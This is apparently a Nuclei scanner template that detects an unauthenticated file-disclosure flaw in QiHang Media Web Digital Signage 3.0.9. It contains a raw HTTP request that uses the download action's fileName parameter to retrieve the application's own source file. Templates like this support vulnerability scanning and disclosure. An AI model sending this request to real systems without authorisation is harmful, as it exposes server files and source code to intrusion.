id: qihang-media-lfi

info:
  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Arbitrary File Disclosure
  author: gy741
  severity: high
  description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: qihang,lfi,disclosure

http:
  - raw:
      - |
        GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "filename=QH.aspx"
          - "application/zip"
        condition: and

      - type: word
        words:
          - "QH.aspx.cs"
          - "QiHang.Media.Web.QH"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100aa0fbd9f5a847e38903648d9a20c2b02f671b1df7afad62aefcfe8610374e76c022100d3fb3a647c21e971fb7e2f85ae207fa8fb9474d58f21d150fce4c44f1c89e60e:922c64590222798bb761d5b6d8e72950
